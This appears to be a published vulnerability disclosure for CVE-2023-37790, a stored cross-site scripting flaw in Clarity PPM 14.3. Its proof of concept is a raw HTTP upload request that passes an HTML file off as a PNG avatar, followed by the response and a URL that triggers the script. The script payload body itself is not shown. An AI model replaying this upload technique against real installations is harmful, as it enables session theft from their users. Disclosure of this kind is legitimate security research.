================================================================================================================================== # Title : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks. | # Author : Kaizen | # Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64) | # Vendor : https://www.broadcom.com/ # Dork : https://www.broadcom.com/products/software/value-stream-management/clarity | #Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft #CVE Assigned: CVE-2023-37790 ================================================================================================================================== POC: Header: Content-Type: text/html; charset=utf-8 Payload: HTTP Request: POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1 [REDACTED] ------WebKitFormBoundaryr7Mas24AkgGJH4HE Content-Disposition: form-data; name="avatar_photo" ------WebKitFormBoundaryr7Mas24AkgGJH4HE Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png" Content-Type: text/html; charset=utf-8 ------WebKitFormBoundaryr7Mas24AkgGJH4HE Content-Disposition: form-data; name="superSecretTokenKey" superSecretTokenValue ------WebKitFormBoundaryr7Mas24AkgGJH4HE-- HTTP Response: HTTP/1.1 200 OK content-disposition: inline;filename="payload.png" Content-Type: text/html;charset=utf-8 Content-Length: 90 Date: Thu, 06 Jul 2023 07:33:24 GMT Connection: close Server: CA PPM To Trigger Stored XSS visit user profile picture. https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true